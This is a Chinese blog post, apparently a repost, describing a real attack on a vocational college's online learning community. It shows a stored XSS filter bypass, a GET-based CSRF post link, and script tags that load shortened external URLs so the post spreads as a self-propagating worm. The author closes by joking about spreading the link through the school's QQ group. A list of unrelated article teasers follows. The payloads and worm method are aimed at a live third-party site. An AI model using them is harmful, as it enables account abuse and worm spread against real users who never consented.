2. 程式人生 > 其它 >【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)

【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)

阿新 發佈:2022-05-23

0x00 儲存XSS

1) 可繞過的XSS

給大家分享個漏洞案例,今天上午剛把電腦修好
某技術學院儲存XSS+CSRF(XSS繞過濾到蠕蟲攻擊)
註冊處:

http://xxx.edu.cn/meol/xxxx

需要註冊才能進入社群發表,先說下儲存XSS,過濾了,發現可繞過
儲存XSS:

http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先過濾再輸出,而不是輸出時過濾,從而導致可繞過 

我們發現他輸入時就進行了過濾,直接替換

<script>alert('XSS')</script>

成功彈框:

 

0x01 CSRF配合XSS蠕蟲

同樣是這個位置,發表話題,改成get請求 

得到連線:
CSRF:

http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE

點選連結會自動發表內容
我們縮短一下連結 網上有線上縮短的,縮短後連結http://suo.im/abc
構造一下csrf連線:

<script src=http://suo.im/abc></script>

(插入到網頁當中,當別人訪問你的個人中心,會自動發表一個內容)
接著我們繼續構造,找到CSRF漏洞處,把後面的內容替換為CSRF連結,也就是訪問此連線會自動發表內容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

 

繼續縮短網址:
縮短後:http://suo.im/XXXX這個時候我們再呼叫一下CSRF+XSS的地址:

<script src=http://suo.im/XXXX></script>

把這個連結插入到網頁當中即可完成XSS蠕蟲攻擊
當A訪問你的主頁時,A會發表和你一樣的內容,當B訪問A的主頁時,B會發表和A一樣的內容,同理,完成XSS蠕蟲攻擊

最後的思路就是自己構造個網站,加這個學校的QQ群,傳送連結哈哈。

  對網安感興趣的關注下公眾號吧~

相關推薦

實戰儲存XSS+CSRFXSS繞過蠕蟲攻擊

0x00 儲存XSS 1) 可繞過XSS 給大家分享個漏洞案例,今天上午剛把電腦修好某技術學院儲存XSS+CSRFXSS繞過濾到蠕蟲攻擊註冊處:

SCOI2008獎勵關 題解狀壓DP+期望

題目連結 題目大意:給定$n$個寶物,每次隨機丟擲一個寶物,獎勵分數為$p_i$。但如果選這個寶物必須選過它的前置寶物集合。共進行$K$輪問最優策略下的期望。

LOJ6172Samjia 和大樹樹形DP+猜結論

點此看題面 大致題意: 給定一棵樹,你可以給每個點賦一個\\(1\\sim m\\)之間的整數權值,要求所有相鄰點權值之差的絕對值\\(\\ge k\\)。求方案數。

JSOI2019精準預測2-SAT & bitset

Description 先有一臺預測機,可以預測當前 \\(n\\) 個人在 \\(T\\) 個時刻內的生死關係。關係有兩種:

CF512DFox And Travelling拓撲+樹上揹包

點此看題面 給定一張\\(n\\)個點\\(m\\)條邊的圖。 訪問圖中一個點,需要滿足與它直接相連的所有點中至多隻有一個沒被訪問過。

PHPPHP程式碼處理普通/不重要的併發情況,例如pv統計不使用MySQL行或表鎖、避免程式冗餘

1、PHP程式碼處理普通/不重要的併發情況,例如統計pv資料:什麼意思呢?

期望彩色圓環金牌導航 期望-5

技術標籤:期望金牌導航期望 彩色圓環 金牌導航 期望-5 題目大意 給你一個環,每個位置的數字等概率為1~m中的其中一個,對於連續的相同數字的串,記其長度為

CentOS7Crontab定時任務定時掃描清理病毒

技術標籤:CentOSCrontab運維centoslinux 簡介: crontab命令常見於Unix和類Unix的作業系統之中,用於設定週期性被執行的指令。該命令從標準輸入裝置讀取指令,並將其存放於“crontab”檔案中,以供之後讀取和執

題解CF1054D Changing Array異或,貪心

Des 給你一個序列 \\(a\\), \\(0 \\le a_{i}\\le2^{k}-1\\),你可以修改裡面的任意元素任意次,修改方法為把序列裡的一個數\\(ai⊕\\) \\(2^{k}-1\\) 其中\\(⊕\\)為異或運算,求最多可以構成多少個連續區間\\([l,r]\\

luogu P4783模板矩陣求逆高斯消元

模板矩陣求逆 題目連結:luogu P4783 題目大意 給你一個 n*n 的矩陣,要你求它的逆矩陣。

CF1305GKuroni and AntihypeBoruvka+高維字首和

題目連結 給定 \\(n\\) 個非負整數 \\(a_{1\\sim n}\\)。 有一個初始為空的可重集合 \\(S\\)。每次選擇一個尚未加入過 \\(S\\) 的元素 \\(a_i\\) 加入 \\(S\\),且可以選擇 \\(S\\) 中一個與 \\(a_i\\) 按位與為 \\

CF710FString Set Queries二進位制分組+AC自動機

題目連結 \\(q\\) 次詢問,每次往字串集合中插入/刪除一個字串,或詢問集合中所有字串在給定字串中的出現次數。

機器學習實戰-- Titanic 資料集3-- 邏輯迴歸

1. 寫在前面: 本篇屬於實戰部分,更注重於演算法在實際專案中的應用。如需對邏輯迴歸演算法本身有詳細的瞭解,可參考以下連結,在本人學習的過程中,起到了很大的幫助:

機器學習實戰-- Titanic 資料集4-- 支援向量機

1. 寫在前面: 本篇屬於實戰部分,更注重於演算法在實際專案中的應用。如需對感知機演算法本身有進一步的瞭解,可參考以下連結,在本人學習的過程中,起到了很大的幫助:

機器學習實戰-- Titanic 資料集5-- 決策樹

1. 寫在前面: 本篇屬於實戰部分,更注重於演算法在實際專案中的應用。如需對感知機演算法本身有進一步的瞭解,可參考以下連結,在本人學習的過程中,起到了很大的幫助:

原創Linux中斷子系統-Workqueue

背景 Read the fucking source code!--By 魯迅 A picture is worth a thousand words. --By 高爾基 說明:

BZOJ4825[HNOI2017] 單旋樹狀陣列

點此看題面 大致題意: 定義"單旋Splay"為\\(Spaly\\),對一棵\\(Spaly\\)進行插入、\\(Spaly\\)最值、\\(Spaly\\)並刪除最值操作,求每次操作的複雜度操作節點深度

BZOJ1426收集郵票 題解 期望

題目:有n種不同的郵票,皮皮想收集所有種類的郵票。唯一的收集方法是到同學凡凡那裡購買,每次只能買一張,並且買到的郵票究竟是n種郵票中的哪一種是等概率的,概率均為1/n。但是由於凡凡也很喜歡郵票,所以皮皮購買

CF600ELomset gelral 題解樹上啟發式合併

題目連結 題目大意:給出一顆含有$n$個結點的樹,每個節點有一個顏色。求樹中每個子樹最多的顏色的編號和。

BZOJ3112[ZJOI2013] 防守戰線單純形法與線性規劃

點此看題面 大致題意: \\(\\begin{align}min\\ \\ &\\sum_{j=1}^nc_jx_j&\\\\s.t.\\ \\ &\\sum_{j=l_i}^{r_i}x_j\\ge b_i&i=1,2,...,m\\\\&x_j\\ge0&j=1,2,...,n\\end{align}\\)